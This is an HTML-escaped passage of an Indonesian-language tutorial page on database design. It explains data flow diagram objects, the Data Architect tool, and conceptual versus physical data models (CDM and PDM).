&lt;b style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;keterangan&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td style=&quot;border: 1pt solid windowtext; padding: 0in 5.4pt; width: 90.45pt;&quot; valign=&quot;top&quot; width=&quot;121&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: 18px;&quot;&gt;
&lt;span lang=&quot;DE&quot; style=&quot;background-color: black; color: white;&quot;&gt;Data Item&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;td style=&quot;border-bottom-color: windowtext; border-bottom-width: 1pt; border-right-color: windowtext; border-right-width: 1pt; border-style: none solid solid none; padding: 0in 5.4pt; width: 262.25pt;&quot; valign=&quot;top&quot; width=&quot;350&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: 18px;&quot;&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;potongan informasi Dasar&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td style=&quot;border: 1pt solid windowtext; padding: 0in 5.4pt; width: 90.45pt;&quot; valign=&quot;top&quot; width=&quot;121&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: 18px;&quot;&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;&amp;nbsp;&lt;span lang=&quot;DE&quot;&gt;External Entity&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;td style=&quot;border-bottom-color: windowtext; border-bottom-width: 1pt; border-right-color: windowtext; border-right-width: 1pt; border-style: none solid solid none; padding: 0in 5.4pt; width: 262.25pt;&quot; valign=&quot;top&quot; width=&quot;350&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: 18px;&quot;&gt;
&lt;span lang=&quot;DE&quot; style=&quot;background-color: black; color: white;&quot;&gt;Object aktif yang mengirim atau menerima data dari suatu sistem&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td style=&quot;border: 1pt solid windowtext; padding: 0in 5.4pt; width: 90.45pt;&quot; valign=&quot;top&quot; width=&quot;121&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: 18px;&quot;&gt;
&lt;span lang=&quot;DE&quot; style=&quot;background-color: black; color: white;&quot;&gt;Process&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;td style=&quot;border-bottom-color: windowtext; border-bottom-width: 1pt; border-right-color: windowtext; border-right-width: 1pt; border-style: none solid solid none; padding: 0in 5.4pt; width: 262.25pt;&quot; valign=&quot;top&quot; width=&quot;350&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: 18px;&quot;&gt;
&lt;span lang=&quot;DE&quot; style=&quot;background-color: black; color: white;&quot;&gt;mentransfer data informasi&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td style=&quot;border: 1pt solid windowtext; padding: 0in 5.4pt; width: 90.45pt;&quot; valign=&quot;top&quot; width=&quot;121&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: 18px;&quot;&gt;
&lt;span lang=&quot;DE&quot; style=&quot;background-color: black; color: white;&quot;&gt;Data flow&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;td style=&quot;border-bottom-color: windowtext; border-bottom-width: 1pt; border-right-color: windowtext; border-right-width: 1pt; border-style: none solid solid none; padding: 0in 5.4pt; width: 262.25pt;&quot; valign=&quot;top&quot; width=&quot;350&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: 18px;&quot;&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;Memindahkan data (transfer data antara proses eksternal entity dan data stores&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td style=&quot;border: 1pt solid windowtext; padding: 0in 5.4pt; width: 90.45pt;&quot; valign=&quot;top&quot; width=&quot;121&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: 18px;&quot;&gt;
&lt;span lang=&quot;DE&quot; style=&quot;background-color: black; color: white;&quot;&gt;Data store&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;td style=&quot;border-bottom-color: windowtext; border-bottom-width: 1pt; border-right-color: windowtext; border-right-width: 1pt; border-style: none solid solid none; padding: 0in 5.4pt; width: 262.25pt;&quot; valign=&quot;top&quot; width=&quot;350&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: 18px;&quot;&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;Tempat storage dimana data disimpan&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: 18px;&quot;&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;b&gt;B. Data architect&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; text-align: justify; text-indent: 0.5in;&quot;&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;Data architect adalah sebuah tools yang digunakan untuk mendesain suatu data base. Tools ini akan memberikan keuntungan yaitu akan dapat memberikan dua tingkat pendekatan dalam desain pemodelan data&amp;nbsp; yaitu tingkat konseptual atau logikal (CDM ; Conseptual data Model) dan tingkat fisikal (PDM : Physical data Model)&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; text-align: justify;&quot;&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;Dengan menggunakan data architect kita akan dapat :&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;ul style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 20px; margin: 0in 20px 20px 0px; padding-left: 40px;&quot; type=&quot;disc&quot;&gt;
&lt;li class=&quot;MsoNormal&quot; style=&quot;line-height: 18px; text-align: justify;&quot;&gt;&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;Membuat Model suatu sistem informasi dengan menggunakan suatu entity-relationship diagram. Model ini disebut&amp;nbsp;&amp;nbsp;&lt;span style=&quot;color: windowtext;&quot;&gt;Conceptual Data Model (CDM)&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li class=&quot;MsoNormal&quot; style=&quot;line-height: 18px; text-align: justify;&quot;&gt;&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;Menghasilkan suatu Physical Data Model ( PDM) untuk suatu target database management sistem ( DBMS), mempertimbangkan pokok-pokok dari&amp;nbsp; DBMS&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li class=&quot;MsoNormal&quot; style=&quot;line-height: 18px; text-align: justify;&quot;&gt;&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;Mengcustumize PDM untuk menyesuaikan performa tingkah laku dan fisik&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li class=&quot;MsoNormal&quot; style=&quot;line-height: 18px; text-align: justify;&quot;&gt;&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;Menghasilkan script database untuk target DBMS&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li class=&quot;MsoNormal&quot; style=&quot;line-height: 18px; text-align: justify;&quot;&gt;&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;&lt;span lang=&quot;DE&quot;&gt;Menghasilkan suatu referensi integritas jika mereka didukung oleh target&amp;nbsp;&lt;/span&gt;database&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li class=&quot;MsoNormal&quot; style=&quot;line-height: 18px; text-align: justify;&quot;&gt;&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;meng-customize&amp;nbsp; dan mencetak laporan model&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li class=&quot;MsoNormal&quot; style=&quot;line-height: 18px; text-align: justify;&quot;&gt;&lt;span lang=&quot;DE&quot; style=&quot;background-color: black; color: white;&quot;&gt;Merekayasa balik aplikasi dan database dan aplikasi&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li class=&quot;MsoNormal&quot; style=&quot;line-height: 18px; text-align: justify;&quot;&gt;&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;Menggambarkan atribut yang diperluas untuk PDM object&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; text-align: justify;&quot;&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; text-align: justify;&quot;&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; text-align: justify;&quot;&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; text-align: justify;&quot;&gt;
&lt;b style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;1. CDM (Conceptual Data Model)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; text-align: justify; text-indent: 0.5in;&quot;&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;Suatu CDM menghadirkan keseluruhan struktur logis dari suatu database, yang mana&amp;nbsp; tidak terikat pada jenis apapun perangkat lunak atau penyimpanan data struktur. Suatu model konseptual sering berisi object data yang belum diterapkan didalam fisik database [Itu] memberi suatu penyajian yang formal menyangkut data yang diperlukan untuk menjalankan perusahaan atau suatu aktivitas bisnis.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; text-align: justify;&quot;&gt;
&lt;span lang=&quot;DE&quot; style=&quot;background-color: black; color: white;&quot;&gt;CDM mempunyai beberapa peran sebagai berikut :&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; margin-left: 35.45pt; text-align: justify; text-indent: -14.15pt;&quot;&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;&lt;span lang=&quot;DE&quot; style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt; line-height: normal;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span lang=&quot;DE&quot;&gt;Menghadirkan organisasi data di (dalam) suatu format grafis&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; margin-left: 35.45pt; text-align: justify; text-indent: -14.15pt;&quot;&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;&lt;span lang=&quot;DE&quot; style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt; line-height: normal;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span lang=&quot;DE&quot;&gt;Memverifikasi kebenaran disain data&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; margin-left: 35.45pt; text-align: justify; text-indent: -14.15pt;&quot;&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;&lt;span lang=&quot;DE&quot; style=&quot;font-family: Symbol;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt; line-height: normal;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span lang=&quot;DE&quot;&gt;Menghasilkan PDM yang (mana)&amp;nbsp; menetapkan implementasi phisik (menyangkut) database&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;&quot;&gt;
&lt;span lang=&quot;DE&quot; style=&quot;background-color: black; color: white;&quot;&gt;Suatu CDM menggambarkan interaksi dari beberapa object berikut:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;&quot;&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;table border=&quot;1&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;MsoTableGrid&quot; style=&quot;border-collapse: collapse; border: none; margin-bottom: 20px; margin-left: 12.5pt; width: 604px;&quot;&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style=&quot;border: 1pt solid windowtext; padding: 0in 5.4pt; width: 83.8pt;&quot; valign=&quot;top&quot; width=&quot;112&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: 18px;&quot;&gt;
&lt;span lang=&quot;DE&quot; style=&quot;background-color: black; color: white;&quot;&gt;Object&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;td style=&quot;border: 1pt solid windowtext; padding: 0in 5.4pt; width: 276.4pt;&quot; valign=&quot;top&quot; width=&quot;369&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: 18px;&quot;&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;keterangan&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td style=&quot;border: 1pt solid windowtext; padding: 0in 5.4pt; width: 83.8pt;&quot; valign=&quot;top&quot; width=&quot;112&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: 18px;&quot;&gt;
&lt;span lang=&quot;DE&quot; style=&quot;background-color: black; color: white;&quot;&gt;Domain&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;td style=&quot;border-bottom-color: windowtext; border-bottom-width: 1pt; border-right-color: windowtext; border-right-width: 1pt; border-style: none solid solid none; padding: 0in 5.4pt; width: 276.4pt;&quot; valign=&quot;top&quot; width=&quot;369&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: 18px;&quot;&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;Satuan nilai-nilai Daerah di mana suatu data item sah&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td style=&quot;border: 1pt solid windowtext; padding: 0in 5.4pt; width: 83.8pt;&quot; valign=&quot;top&quot; width=&quot;112&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: 18px;&quot;&gt;
&lt;span lang=&quot;DE&quot; style=&quot;background-color: black; color: white;&quot;&gt;Data item&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;td style=&quot;border-bottom-color: windowtext; border-bottom-width: 1pt; border-right-color: windowtext; border-right-width: 1pt; border-style: none solid solid none; padding: 0in 5.4pt; width: 276.4pt;&quot; valign=&quot;top&quot; width=&quot;369&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: 18px;&quot;&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;potongan informasi Dasar&lt;span lang=&quot;DE&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td style=&quot;border: 1pt solid windowtext; padding: 0in 5.4pt; width: 83.8pt;&quot; valign=&quot;top&quot; width=&quot;112&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: 18px;&quot;&gt;
&lt;span lang=&quot;DE&quot; style=&quot;background-color: black; color: white;&quot;&gt;Entity atribute&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;td style=&quot;border-bottom-color: windowtext; border-bottom-width: 1pt; border-right-color: windowtext; border-right-width: 1pt; border-style: none solid solid none; padding: 0in 5.4pt; width: 276.4pt;&quot; valign=&quot;top&quot; width=&quot;369&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: 18px;&quot;&gt;
&lt;span lang=&quot;DE&quot; style=&quot;background-color: black; color: white;&quot;&gt;potongan informasi Dasar yang terberkait dengan suatu entity&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td style=&quot;border: 1pt solid windowtext; padding: 0in 5.4pt; width: 83.8pt;&quot; valign=&quot;top&quot; width=&quot;112&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: 18px;&quot;&gt;
&lt;span lang=&quot;DE&quot; style=&quot;background-color: black; color: white;&quot;&gt;Entity&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;td style=&quot;border-bottom-color: windowtext; border-bottom-width: 1pt; border-right-color: windowtext; border-right-width: 1pt; border-style: none solid solid none; padding: 0in 5.4pt; width: 276.4pt;&quot; valign=&quot;top&quot; width=&quot;369&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: 18px;&quot;&gt;
&lt;span lang=&quot;DE&quot; style=&quot;background-color: black; color: white;&quot;&gt;Orang Kesatuan, tempat, hal, atau konsep yang mempunyai karakteristik [bunga/minat] kepada perusahaan dan sekitar yang anda inginkan untuk menyimpan informasi&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td style=&quot;border: 1pt solid windowtext; padding: 0in 5.4pt; width: 83.8pt;&quot; valign=&quot;top&quot; width=&quot;112&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: 18px;&quot;&gt;
&lt;span lang=&quot;DE&quot; style=&quot;background-color: black; color: white;&quot;&gt;Relationship&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;td style=&quot;border-bottom-color: windowtext; border-bottom-width: 1pt; border-right-color: windowtext; border-right-width: 1pt; border-style: none solid solid none; padding: 0in 5.4pt; width: 276.4pt;&quot; valign=&quot;top&quot; width=&quot;369&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: 18px;&quot;&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;Nama asosiasi atau koneksi antar entity&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td style=&quot;border: 1pt solid windowtext; padding: 0in 5.4pt; width: 83.8pt;&quot; valign=&quot;top&quot; width=&quot;112&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: 18px;&quot;&gt;
&lt;span lang=&quot;DE&quot; style=&quot;background-color: black; color: white;&quot;&gt;Inheritance link&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;td style=&quot;border-bottom-color: windowtext; border-bottom-width: 1pt; border-right-color: windowtext; border-right-width: 1pt; border-style: none solid solid none; padding: 0in 5.4pt; width: 276.4pt;&quot; valign=&quot;top&quot; width=&quot;369&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: 18px;&quot;&gt;
&lt;span lang=&quot;DE&quot; style=&quot;background-color: black; color: white;&quot;&gt;hubungan Khusus yang menggambarkan suatu kesatuan sebagai kasus khusus dari suatu kesatuan yang] lebih umum&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;&quot;&gt;
&lt;b style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;2 PDM (Physical data Model)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px; text-align: justify; text-indent: 0.5in;&quot;&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;&lt;span lang=&quot;DE&quot;&gt;PDM adalah merupakan suatu implementasi phisik dari database. Dengan PDM, kita dapat mempertimbangkan secara detil tentang implementasi phisik nyata. PDM mmemasukkan kedalam laporan perangkat lunak atau penyimpanan data struktur.&amp;nbsp;&lt;/span&gt;Kamu dapat memodifikasi PDM untuk menyesuaikan &amp;nbsp;batasan phisik (physical constrain) atau hasil rancangan&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;&quot;&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;&amp;nbsp;&lt;span lang=&quot;DE&quot;&gt;PDM mempunyai beberapa peran sebagai berikut :&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;ul style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 20px; margin: 0in 20px 20px 0px; padding-left: 40px;&quot; type=&quot;disc&quot;&gt;
&lt;li class=&quot;MsoNormal&quot; style=&quot;line-height: 18px; text-align: justify;&quot;&gt;&lt;span lang=&quot;DE&quot; style=&quot;background-color: black; color: white;&quot;&gt;Menghadirkan organisasi phisik data di (dalam) suatu format grafis&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li class=&quot;MsoNormal&quot; style=&quot;line-height: 18px; text-align: justify;&quot;&gt;&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;Menghasilkan catatan untuk modifikasi dan pembuatan database&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li class=&quot;MsoNormal&quot; style=&quot;line-height: 18px; text-align: justify;&quot;&gt;&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;Menggambarkan batasan (constrain) dan referensi integritas&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li class=&quot;MsoNormal&quot; style=&quot;line-height: 18px; text-align: justify;&quot;&gt;&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;Menghasilkan extended atribut&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li class=&quot;MsoNormal&quot; style=&quot;line-height: 18px; text-align: justify;&quot;&gt;&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;Merekayasa balik database yang ada&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li class=&quot;MsoNormal&quot; style=&quot;line-height: 18px; text-align: justify;&quot;&gt;&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;Memperbaharui suatu CDM&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 18px;&quot;&gt;
&lt;span lang=&quot;FI&quot; style=&quot;background-color: black; color: white;&quot;&gt;Ada beberapa jalan untuk membuat suatu PDM:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;ul style=&quot;font-family: Arial, Helvetica, sans-serif; font-size: 12px; line-height: 20px; margin: 0in 20px 20px 0px; padding-left: 40px;&quot; type=&quot;disc&quot;&gt;
&lt;li class=&quot;MsoNormal&quot; style=&quot;line-height: 18px;&quot;&gt;&lt;span lang=&quot;DE&quot; style=&quot;background-color: black; color: white;&quot;&gt;Membuat suatu PDM dari suatu CDM&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li class=&quot;MsoNormal&quot; style=&quot;line-height: 18px;&quot;&gt;&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;Membuat suatu PDM sejak dari awal mula&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
